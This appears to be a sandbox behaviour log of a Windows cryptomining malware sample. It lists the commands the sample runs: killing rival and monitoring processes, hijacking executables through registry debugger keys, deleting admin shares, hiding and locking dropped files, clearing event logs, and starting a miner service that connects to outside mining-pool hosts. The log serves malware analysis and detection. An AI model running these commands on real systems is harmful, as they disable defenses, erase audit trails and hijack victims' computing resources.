C:\Windows\SysWOW64\sc.exe
sc delete MicrosotMais
2⤵
- Launches sc.exe
PID:4584

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im dl1hots.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4028

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im rundlls.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3880

C:\Windows\SysWOW64\net1.exe
net1 user mm123$ /del
2⤵
PID:4088

C:\Windows\SysWOW64\net.exe
net stop mssecsvc2.0
2⤵
PID:1272

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssecsvc2.0
3⤵
PID:2432

C:\Windows\SysWOW64\net.exe
net user mm123$ /del
2⤵
PID:5084

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user mm123$ /del
3⤵
PID:3688

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im d1lhots.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3404

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f
2⤵
- Sets file execution options in registry
PID:4268

C:\Windows\SysWOW64\sc.exe
sc delete mssecsvc2.0
2⤵
- Launches sc.exe
PID:1944

C:\Windows\SysWOW64\net.exe
net stop mssecsvc2.1
2⤵
PID:3940

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssecsvc2.1
3⤵
PID:3696

C:\Windows\SysWOW64\sc.exe
sc delete mssecsvc2.1
2⤵
- Launches sc.exe
PID:2576

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install MetPipAtcivator c:\windows\Fonts\conhost.exe
2⤵
- Executes dropped EXE
PID:3312

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set MetPipAtcivator Description Provides performance library information from Windows Management.
2⤵
- Executes dropped EXE
PID:2604

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start MetPipAtcivator
2⤵
- Executes dropped EXE
PID:3104

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start MetPipAtcivator
2⤵
- Executes dropped EXE
PID:2020

C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Windows\TEMP\csonhost.bat
2⤵
PID:820

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
3⤵
PID:2548

C:\Windows\SysWOW64\PING.EXE
ping 127.1 -n 5
3⤵
- Runs ping.exe
PID:3972

C:\Windows\SysWOW64\sc.exe
sc start MetPipAtcivator
3⤵
- Launches sc.exe
PID:4616

C:\Windows\SysWOW64\sc.exe
sc start MetPipAtcivator
3⤵
- Launches sc.exe
PID:980

C:\Windows\SysWOW64\net.exe
net share iPC$ /delete
3⤵
PID:2184

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share iPC$ /delete
4⤵
PID:1644

C:\Windows\SysWOW64\net.exe
net share admin$ /delete
3⤵
PID:3880

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share admin$ /delete
4⤵
PID:3816

C:\Windows\SysWOW64\net.exe
net share c$ /delete
3⤵
PID:2196

C:\Windows\SysWOW64\net.exe
net share d$ /delete
3⤵
PID:5076

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share d$ /delete
4⤵
PID:2200

C:\Windows\SysWOW64\net.exe
net share e$ /delete
3⤵
PID:3756

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share e$ /delete
4⤵
PID:2144

C:\Windows\SysWOW64\net.exe
net share f$ /delete
3⤵
PID:3224

C:\Windows\SysWOW64\net.exe
net stop lanmanserver /y
3⤵
PID:2548

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop lanmanserver /y
4⤵
PID:2780

C:\Windows\SysWOW64\sc.exe
sc config lanmanserver start= DISABLED
3⤵
- Launches sc.exe
PID:4340

C:\Windows\SysWOW64\sc.exe
sc start PolicyAgent
3⤵
- Launches sc.exe
PID:3216

C:\Windows\SysWOW64\sc.exe
sc config PolicyAgent start= AUTO
3⤵
- Launches sc.exe
PID:1332

C:\Windows\SysWOW64\sc.exe
sc stop Graphipcs_PerfSvcs
3⤵
- Launches sc.exe
PID:5000

C:\Windows\SysWOW64\sc.exe
sc delete Graphipcs_PerfSvcs
3⤵
- Launches sc.exe
PID:2524

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\svchost.exe'" call Terminate
3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
PID:2340

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\svchost.exe
3⤵
- Sets file to hidden
PID:1772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:308

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\svchost.exe /d everyone
3⤵
PID:1576

C:\Windows\SysWOW64\sc.exe
sc stop conhost
3⤵
- Launches sc.exe
PID:5108

C:\Windows\SysWOW64\sc.exe
sc delete conhost
3⤵
- Launches sc.exe
PID:1140

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\conhost.exe'" call Terminate
3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
PID:2300

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\conhost.exe /a
3⤵
- Modifies file permissions
PID:4572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3976

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\conhost.exe /d everyone
3⤵
PID:1268

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d C:\\WINDOWS\\system32\\svchost.exe /f
3⤵
- Sets file execution options in registry
PID:1448

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d taskkill.exe /f
3⤵
- Sets file execution options in registry
PID:4200

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe" /v "debugger" /d taskkill.exe /f
3⤵
- Sets file execution options in registry
PID:4320

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe" /v "debugger" /d taskkill.exe /f
3⤵
- Sets file execution options in registry
PID:936

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe" /v "debugger" /d taskkill.exe /f
3⤵
- Sets file execution options in registry
PID:4252

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe" /v "debugger" /d taskkill.exe /f
3⤵
- Sets file execution options in registry
PID:1748

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe" /v "debugger" /d taskkill.exe /f
3⤵
- Sets file execution options in registry
PID:1096

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe" /v "debugger" /d taskkill.exe /f
3⤵
- Sets file execution options in registry
PID:4536

C:\Windows\SysWOW64\sc.exe
sc start PolicyAgent
3⤵
- Launches sc.exe
PID:2516

C:\Windows\SysWOW64\sc.exe
sc config PolicyAgent start= AUTO
3⤵
- Launches sc.exe
PID:1956

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static del all
3⤵
PID:5112

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=Aliyun
3⤵
PID:2368

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=Allowlist
3⤵
PID:2948

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=denylist
3⤵
PID:1184

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
3⤵
PID:3196

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
3⤵
PID:2972

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
3⤵
PID:2004

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
3⤵
PID:1628

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
3⤵
PID:3652

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=Allow action=permit
3⤵
PID:4880

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
3⤵
PID:2992

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny
3⤵
PID:4968

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=Aliyun assign=y
3⤵
PID:3564

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im lsars.exe /im lsacs.exe
3⤵
- Kills process with taskkill
PID:3964

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im sqlservr.exe
3⤵
- Kills process with taskkill
PID:3156

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'" call Terminate
3⤵
- Kills process with WMI
PID:2536

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\Fonts\sqlservr.exe
3⤵
- Sets file to hidden
PID:3296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3572

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Fonts\sqlservr.exe /d everyone
3⤵
PID:3744

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\Fonts\csrss.exe
3⤵
- Sets file to hidden
PID:2860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4372

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Fonts\csrss.exe /d everyone
3⤵
PID:4408

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate
3⤵
- Kills process with WMI
PID:4188

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\lsass.exe
3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:2016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4272

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\lsass.exe /d everyone
3⤵
PID:4204

C:\Windows\SysWOW64\sc.exe
sc stop "Application Layre Gateway Saervice"
3⤵
- Launches sc.exe
PID:308

C:\Windows\SysWOW64\sc.exe
sc delete "Application Layre Gateway Saervice"
3⤵
- Launches sc.exe
PID:1964

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im boy.exe
3⤵
- Kills process with taskkill
PID:5108

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\boy.exe
3⤵
- Sets file to hidden
PID:4916

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4332

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\boy.exe /d everyone
3⤵
PID:5072

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im powershell.exe
3⤵
- Kills process with taskkill
PID:1196

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /a
3⤵
- Modifies file permissions
PID:3976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1448

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
3⤵
PID:4228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4320

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
3⤵
PID:4216

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1372

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
3⤵
PID:4336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1096

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
3⤵
PID:4552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2516

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
3⤵
PID:3200

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system
3⤵
PID:4192

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
3⤵
- Modifies file permissions
PID:1044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2624

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
3⤵
PID:1456

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
3⤵
PID:3120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4404

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
3⤵
PID:2104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2828

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
3⤵
PID:2948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2156

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
3⤵
PID:1184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4556

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
3⤵
PID:3320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1656

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\sethc.exe /a
3⤵
- Modifies file permissions
PID:4048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3660

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /g Administrators:f
3⤵
PID:3464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:964

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /e /g Users:r
3⤵
PID:3196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2872

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /e /g Administrators:r
3⤵
PID:3164

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1484

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /e /d SERVICE
3⤵
PID:376

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:204

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /e /d "network service"
3⤵
PID:1188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3528

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /e /g system:r
3⤵
PID:5116

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im wscript.exe
3⤵
- Kills process with taskkill
PID:4920

C:\Windows\SysWOW64\wevtutil.exe
wevtutil cl "windows powershell"
3⤵
- Clears Windows event logs
PID:1252

C:\Windows\SysWOW64\wevtutil.exe
wevtutil cl "security"
3⤵
- Clears Windows event logs
PID:352

C:\Windows\SysWOW64\wevtutil.exe
wevtutil cl "system"
3⤵
- Clears Windows event logs
PID:3696

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set MetPipAtcivator DisplayName Network Location Service
2⤵
- Executes dropped EXE
PID:1548

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"
2⤵
PID:1332

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe
1⤵
- Executes dropped EXE
PID:1108

\??\c:\windows\Fonts\conhost.exe
"c:\windows\Fonts\conhost.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2164

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:880

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:3304

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4564

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2524

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im rundll32.exe /f /T
3⤵
PID:4320

C:\Windows\SysWOW64\taskkill.exe
taskkill /im rundll32.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1676

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im autoruns.exe /f /T
3⤵
PID:1196

C:\Windows\SysWOW64\taskkill.exe
taskkill /im autoruns.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2324

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im perfmon.exe /f /T
3⤵
PID:2100

C:\Windows\SysWOW64\taskkill.exe
taskkill /im perfmon.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1340

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im ProcessHacker.exe /f /T
3⤵
PID:1044

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ProcessHacker.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1744

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im procexp.exe /f /T
3⤵
PID:5112

C:\Windows\SysWOW64\taskkill.exe
taskkill /im procexp.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4440

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im taskmgr.exe /f /T
3⤵
PID:1956

C:\Windows\SysWOW64\taskkill.exe
taskkill /im taskmgr.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1748

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:376

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3840

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
- Executes dropped EXE
PID:2520

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:4324

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
PID:740

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2064

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1484

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
- Executes dropped EXE
PID:1504

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3064

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:908

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3744

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3296

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1724

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3700

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4528

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4592

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3604

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:4480

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3384

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2520

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3840

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3688

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2432

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3728

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3224

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4116

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1524

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:656

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4164

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:520

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4588

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4648

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1568

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2992

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3152

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2144

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:300

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2704

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2696

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4292

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:656

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4344

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3416

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4728

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1928

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2056

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1364

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1772

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2232

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4260

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:364

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4592

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4396

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4320

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1748

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1096

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4552

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4596

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4192

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3992

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3604

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2104

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4236

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1656

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3384

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4324

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3196

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:840

